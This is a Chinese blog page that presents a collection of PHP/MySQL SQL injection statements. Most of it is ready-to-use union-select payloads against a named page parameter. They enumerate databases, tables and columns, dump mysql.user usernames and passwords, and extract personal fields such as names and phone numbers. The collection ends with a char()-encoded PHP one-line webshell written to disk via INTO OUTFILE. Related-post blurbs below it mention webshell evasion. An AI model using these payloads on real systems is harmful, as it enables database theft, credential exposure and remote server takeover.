php注入一句话,总结的php注入语句

最新推荐文章于 2022-06-26 08:37:41 发布
最新推荐文章于 2022-06-26 08:37:41 发布
阅读量569 收藏 1
点赞数
文章标签: php注入一句话

2008年02月24日 星期日 22:291.判断是否存在注入,加';and 1=1;and 1=2

2.判断版本 and ord(mid(version(),1,1))>51 代替。

5.判断数据库连接帐号有没有写权限,and (select count(*) from

mysql.user)>0

select1,concat(char(124,13,10),SCHEMA_NAME,char(124,13,10)),3,4,5,6,7,8,9,10,11,12,13,14,15

frominformation_schema.SCHEMA limit 0,1/*

先用union select 0,1,TABLE_NAME,3,4 FROM INFORMATION_SCHEMA.TABLES

limit 0,1/*把所有的表暴出来

再用union select 0,1,COLUMN_NAME,3,4 FROM INFORMATION_SCHEMA.COLUMNS

WHERE TABLE_NAME=要查询的表名17,1/*

屡试不爽

http://localhost/inject.php?id=1

and 1=2 union select

concat(char(124,13,10),SCHEMA_NAME,char(124,13,10)),2,3,4,5,6,7,8

FROM INFORMATION_SCHEMA.TABLES where

information_schema.SCHEMATA.SCHEMA_NAME=0x276773726327 limit

2,1

union select

concat(char(124,13,10),TABLE_NAME,char(124,13,10)),2,3,4,5,6,7,8

FROM information_schema.SCHEMATA where

information_schema.SCHEMATA.SCHEMA_NAME=0x276773726327

union select 1,2,load_file('c:\123.txt'),4,5,6,into

outfile'123.php'

/*相关信息查询

/job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),@@basedir,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

/* and 1=1

current_user() session_user() system_user() @@datadir @@tmpdir

@@version_compile_os

job_detail.php?InfoId=347 and 1=2 union select

1,2,3,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),5,6,7,8

from (select * from (select * from mysql.user order by user limit

0,1) t order by user desc)t limit 1/* and 1=1

暴数据库用户名和密码

job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from mysql.user order by user limit

0,1) t order by user desc)t limit 1/* and 1=1

ob_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),password,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from mysql.user order by user limit

0,1) t order by user desc)t limit 1/* and 1=1

job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from mysql.user order by user limit

1,1) t order by user desc)t limit 1/* and 1=1

and 1=2 union select

1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from mysql.user order by user limit

4,1) t order by user desc)t limit 1/* and 1=1

/job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),count(*),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from information_schema.tables group by table_schema

order by table_schema)t limit 1/* and 1=1

| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE |

ENGINE | VERSION | RO

W_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH |

MAX_DATA_LENGTH | INDEX_L

ENGTH | DATA_FREE | AUTO_INCREMENT |

CREATE_TIME |

UPDATE_TIME |

CHECK_TIME | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS |

TABLE_COMMENT |

+---------------+--------------+------------+------------+--------+---------+---

---------+------------+----------------+-------------+-----------------+--------

------+-----------+----------------+---------------------+---------------------+

------------+-----------------+----------+----------------+---------------+

|

NULL | chinapiao |

air_city | BASE TABLE | MyISAM

| 10 | Dy

namic | 884

| 39

| 34740 | 281474976710655 |

11264

| 0

| 1982 | 2009-04-09 21:22:59 | 2009-04-09 21:40:25 |

NULL | utf8_general_ci

| NULL

| | |

爆出所有库名

job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from information_schema.tables group

by table_schema order by table_schema limit 0,1) t order by

table_schema desc)t limit 1/* and 1=1

^^^information_schema^^^

job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from information_schema.tables group

by table_schema order by table_schema limit 1,1) t order by

table_schema desc)t limit 1/* and 1=1

^^^league^^^

job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from information_schema.tables group

by table_schema order by table_schema limit 2,1) t order by

table_schema desc)t limit 1/* and 1=1

^^^mysql^^^

用selelct查询语句查询数据库

inject.php?id=1 and (select ascii(substr(table_schema,8,1)) from

(select * from (select * from information_schema.tables group by

table_schema order by table_schema limit 3,1) t order by

table_schema desc)t limit 1)>120 and 1=1

inject.php?id=1 and (select ascii(substr(table_schema,8,1)) from

(select * from (select * from information_schema.tables group by

table_schema order by table_schema limit 3,1) t order by

table_schema desc)t limit 1)>116 and 1=1

/*暴表

跨库查询暴表

job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),cast(count(*) as

char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from

information_schema.tables where table_schema=0x6c6561677565 limit

1/* and 1=1

跨库查询暴列

/job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),cast(count(*) as

char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from

information_schema.columns where

table_name=0x6962665f656d61696c5f6c6f6773 and

table_schema=0x6c6561677565 limit 1/* and 1=1

job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),cast(count(*) as

char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from

information_schema.tables where table_schema=0x73697365 limit 1/*

and 1=1

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from information_schema.tables where

table_schema=0x73697365 order by table_schema limit 0,1) t order by

table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from information_schema.tables where

table_schema=0x73697365 order by table_schema limit 1,1) t order by

table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from information_schema.tables where

table_schema=0x73697365 order by table_schema limit 2,1) t order by

table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from information_schema.tables where

table_schema=0x73697365 order by table_schema limit 3,1) t order by

table_schema desc)t limit 1/* and 1=1 HTTP/1.1

/*暴列

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),cast(count(*) as

char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from

information_schema.columns where

table_name=0x6d6174726963756c6174657232303035 and

table_schema=0x73697365 limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from information_schema.columns where

table_name=0x6d6174726963756c6174657232303035 and

table_schema=0x73697365 order by 1 limit 0,1) t order by 1 desc)t

limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from information_schema.columns where

table_name=0x6d6174726963756c6174657232303035 and

table_schema=0x73697365 order by 1 limit 1,1) t order by 1 desc)t

limit 1/* and 1=1 HTTP/1.1

/job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from information_schema.columns where

table_name=0x6d6174726963756c6174657232303035 and

table_schema=0x73697365 order by 1 limit 2,1) t order by 1 desc)t

limit 1/* and 1=1 HTTP/1.1

/*猜解列值

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),cast(count(*) as

char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from

matriculater2005 where 1=1 limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),numberid,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from matriculater2005 where 1=1 order

by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from matriculater2005 where 1=1 order

by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),phone,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from matriculater2005 where 1=1 order

by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),linkman,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from matriculater2005 where 1=1 order

by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),specialityid,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from matriculater2005 where 1=1 order

by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(94),char(94),char(94),speciality,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1

from (select * from (select * from matriculater2005 where 1=1 order

by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

/*写入php一句话木马

has been here"?>

GET /job_detail.php?InfoId=347 and 1=2 union select

1,concat(char(60),char(63),char(114),char(101),char(113),char(117),char(105),char(114),char(101),char(40),char(36),char(95),char(82),char(69),char(81),char(85),char(69),char(83),char(84),char(91),char(39),char(101),char(118),char(105),char(108),char(95),char(102),char(105),char(108),char(101),char(95),char(112),char(97),char(116),char(104),char(39),char(93),char(41),char(59),char(101),char(99),char(104),char(111),char(32),char(34),char(122),char(119),char(101),char(108),char(108),char(32),char(104),char(97),char(115),char(32),char(98),char(101),char(101),char(110),char(32),char(104),char(101),char(114),char(101),char(34),char(63),char(62),char(13),char(10)),1,1,1,1,1,1,1,1,1,1,1

into outfile '/etc/zwell.php'/* and 1=1 HTTP/1.1

方祯
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php注入代码
10-12
1.将waf.php传到要包含的文件的目录 2.在页面中加入防护,有两种做法,根据情况二选一即可: a).在所需要防护的页面加入代码 require_once('waf.php'); 就可以做到页面防注入、跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('waf.php');来调用本代码 常用php系统添加文件 PHPCMS V9 \phpcms\base.php PHPWIND8.7 \data\sql_config.php DEDECMS5.7 \data\common.inc.php DiscuzX2 \config\config_global.php Wordpress \wp-config.php Metinfo \include\head.php b).在每个文件最前加上代码 在php.ini中找到: Automatically add files before or after any PHP document. auto_prepend_file = waf.php路径;
php sql注入
技术的搬运工
01-16 2167
在应用程序中,为了和用户交互,允许用户提交输入数据,假如应用程序并没有对用户输入数据进行处理,攻击者可以输入一些跟sql语句相关的字符串(一般带有特殊字符)从而让应用程序执行危险的 SQL 操作,导致泄漏机密数据(比如用户信息)或直接修改删除线上的数据。
php7可用一句话,PHP7新特性简述
weixin_35256987的博客
03-16 277
类型声明看代码,一目了然了。class person{public function age(int $age) : string{return 'Age is ' . $age;}}命名空间与use关键字批量声明非混合模式use Publishers\Packt\{ Book, Ebook, Video};use function Publishers\Packt\{ getBook, save...
PHP代码注入PHP语言常见可注入函数以及PHP代码注入漏洞的利用实例
m0_64378913的博客
06-26 6299
目录1 PHP注入概述2 相关函数与语言结构2.1 eval()函数2.2 assert()函数2.3 preg_replace()函数2.4 call_user_func()函数2.5 动态函数`$a($b)`3 总结 1 PHP注入概述 RCE概念:remote command/code execute,远程命令/代码执行。 PHP代码执行:在WEB中,PHP代码执行是指应用程序过滤不严,用户可用通过请求将代码注入到应用中执行。 PHP代码注入与SQL注入比较: 其注入思想是类似的,均是构造语句绕过服务
php手工注入语句,PHP+MySQL 手工注入语句大全
weixin_42138716的博客
03-10 247
PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下。暴字段长度Order by num/*匹配字段and 1=1 union select 1,2,3,4,5…….n/*暴字段位置and 1=2 union select 1,2,3,4,5……n/*利用内置函数暴数据库信息version() database() user()不用猜解可用字段暴数据库信息(有些网站...
php一句话怎么写_php一句话木马怎么写
weixin_29044713的博客
03-08 2095
php一句话木马怎么写?PHP一句话木马一:关于PHP一句话木马:
PHP注入完整教程
hyshucom
06-09 243
在这个注入风靡的时代,多少菜鸟拿着工具四处冲锋.如果你不想成为工具的奴隶,不想遇到PHP就退避三舍,不想继续做着ASP的菜鸟之群,不 想......那么请你静下心来, 随我一同走完这次的入侵检测全过程.相信你必然能有所收获.不只在技术上,更在思路上,更在意识上..   判断是否存在注入:首先,PHP和ASP判断注入的方法一样,在一个动态连接后面加上and 1=1,and 1=2看其返回结果即...
PHP与SQL语句一句话木马总结
mysteryflower的专栏
10-22 466
一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来: <?php @eval($_GET["code"])?> <?php @system($_POST["cmd"])?> 二、编码的替换的类型: <?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9wa...
php中fputs写入一句话,PHP fputs( )用法及代码示例
weixin_39544333的博客
03-11 569
PHP中的fputs()函数是一个内置函数,用于写入打开的文件。fputs()函数在文件末尾或达到指定长度(作为参数传递)时停止,以先到者为准。文件,字符串和必须写入的长度作为参数发送到fputs()函数,它返回成功时写入的字节数,失败时返回FALSE。fputs()函数是fwrite()函数的别名。用法:fputs(file, string, length)使用的参数:PHP中的fputs()函...
php注入十点基本步骤
leanov的专栏
03-21 337
<br /><br />来源:Neeao<br />1.判断是否存在注入,加’;and 1=1;and 1=2<br />2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询<br />3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10<br />4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3,……./*直到返回正常,说明猜到准
php注入 php漏洞
06-24
给大家演示一个PHP注入的原理。那么怎么来利用呢,我们先来检查一下数据库用的是什么。大家都知道mysql和PHP都是支持 /* 注释符的。那么我们在 id=1 后面加了注释符号看是否正常。 查询语句执行正常,只是在 mysql_fetch_array 这一步出现错误,那就代表该数据库使用的是mysql。我们再来查询一下使用的mysql版本。是5以上的版本。那么就代表我们可以使用 union 连接查询。呵呵。 查询Mysql版本:SELECT * FROM `news` where `id` = 1 and ord(mid(version(),1,1))>51 /* 我们把 id=3的数据也读取出来了,这就是注入漏洞。
php注入语句大全.txt
07-18
php注入语句大全.txt
PHP+MySQL 手工注入语句大全 推荐
10-29
PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下。
PHP与SQL注入攻击[一]
12-17
SQL注入攻击通常通过给站点数据库提交不良的数据或查询语句来实现,很可能使数据库中的纪录遭到暴露,更改或被删除。下面来谈谈SQL注入攻击是如何实现的,又如何防范。 看这个例子: // supposed input $name = ...
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
php代码注入+系统命令注入知识点总结.pdf
02-09
根据网上视频课程学习总计知识点,文档结构分为php代码注入和os代码...php代码注入从原理 相关语句函数 利用 防御方面做出总结 os系统命令注入从 原理成因 相关函数 利用 防御方面做出总结 整理为文档 可以方便查阅
jedis示例代码压缩包
04-23
jedis示例代码
高分课程设计 QT5.7+Sqllite数据库小系统源码+部署文档+全部数据资料
最新发布
04-23
【资源说明】 高分课程设计 QT5.7+Sqllite数据库小系统源码+部署文档+全部数据资料 可实现数据库的可视化操作:增、删、改、查.zip 【备注】 1、该项目是高分毕业设计项目源码,已获导师指导认可通过,答辩评审分达到95分 2、该资源内项目代码都经过mac/window10/11/linux测试运行成功,功能ok的情况下才上传的,请放心下载使用! 3、本项目适合计算机相关专业(如软件工程、计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载使用,也可作为毕业设计、课程设计、作业、项目初期立项演示等,当然也适合小白学习进阶。 4、如果基础还行,可以在此代码基础上进行修改,以实现其他功能,也可直接用于毕设、课设、作业等。 欢迎下载,沟通交流,互相学习,共同进步!
中文文本分类 传统机器学习+深度学习.zip
04-23
中文文本分类 传统机器学习+深度学习
php一句话木马免杀
08-03
引用[1]中提到了一个关于PHP一句话木马的实验,该木马成功骗过了阿里云的检测。木马的代码被放置在服务器的php文件夹下的miansha.php文件中。该木马使用了一些技巧来绕过检测,比如设置了执行时间限制和忽略用户中止请求。木马会在循环中不断将自身代码写入一个名为phpinfo.php的文件中。[1] 引用[2]中提到了生成的phpinfo.php文件的代码。该代码使用了一些字符串替换和反转的技巧来隐藏真正的恶意代码。该木马会检查传入的GET参数,并与预设的MD5值进行比较,如果匹配则执行一些操作。[2] 引用[3]中提到了一个关于组装代码的过程,通过使用之前准备好的函数和字符串,将需要的语句拼接成一个匿名函数。[3] 总结来说,PHP一句话木马免杀是指通过一些技巧和手段来绕过安全检测,使木马代码能够成功执行而不被发现。这些技巧包括设置执行时间限制、忽略用户中止请求、使用字符串替换和反转等。然而,这种行为是非法的,违反了计算机安全和隐私保护的原则。建议用户遵守法律法规,不要从事任何违法活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值